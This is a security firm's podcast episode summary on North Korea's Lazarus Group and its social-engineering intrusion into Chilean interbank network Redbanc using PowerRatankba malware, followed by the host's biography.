Collective Intelligence Podcast, Vitali Kremez on Redbanc Attack and Lazarus Group
By Mike Mimoso
North Korea’s Lazarus Group has notoriously been linked to massive thefts of information and money since its 2014 attack against the Sony Group. These persistent, patient, and capable state-sponsored actors are best known for having stolen hundreds of millions of dollars from financial organizations in Bangladesh, Poland, Mexico, and elsewhere globally, allegedly to fund other activities within the group.
The most recent intrusion attributed to the North Korean APT was disclosed earlier this month when officials at Chilean interbank network Redbanc confirmed an attack against their organization. Researchers at Flashpoint last week released a report explaining the connection between the PowerRatankba malware found on the Redbanc network and Lazarus.
In this episode of the Collective Intelligence podcast, Flashpoint Director of Research Vitali Kremez joins Editorial Director Mike Mimoso on to discuss the incident and Flashpoint’s analysis of PowerRatankba.
The incident took place in December when a Redbanc developer used a company computer to answer a job listing via LinkedIn. The threat actors, realizing the opportunity, set up a Skype interview with the developer and—unique to Lazarus—used a native Spanish speaker to conduct the call and send the developer a link to a phony job application that was in reality a dropper that called out and downloaded PowerRatankba.
PowerRatankba, according to Flashpoint’s analysis, is a PowerShell reconnaissance tool that allowed the attackers to steal system information while simultaneously bypassing antivirus detection. The goal was to access privileged users and systems critical to Redbanc’s operations.
Vitali and Mike discuss the intricacies of the malware, Lazarus Group’s focus on stealing money, the difficulties associated with attribution in incidents such as this one, as well as mitigation strategies and recommendations for financial institutions.
The Collective Intelligence Podcast, presented by Flashpoint and hosted by Editorial Director Mike Mimoso, features regular interviews with a diverse set of industry experts and Flashpoint analysts on the latest information security news and industry trends.
Michael Mimoso brings over a decade of experience in IT security news reporting to Flashpoint. As Editorial Director, he collaborates with marketing, analyst, and leadership teams to share the company’s story. Prior to Flashpoint, Mike was as an Editor of Threatpost, where he covered security issues and cybercrime affecting businesses and end-users.
Prior to joining Threatpost, Mike was Editorial Director of the Security Media Group at TechTarget and Editor of Information Security magazine where he won several ASBPE national and regional writing awards. In addition, Information Security was a two-time finalist for national magazine of the year. He has been writing for business-to-business IT publications for 11 years, with a primary focus on information security.
Earlier in his career, Mike was an editor and reporter at several Boston-area newspapers. He holds a bachelor’s degree from Stonehill College in North Easton, Massachusetts.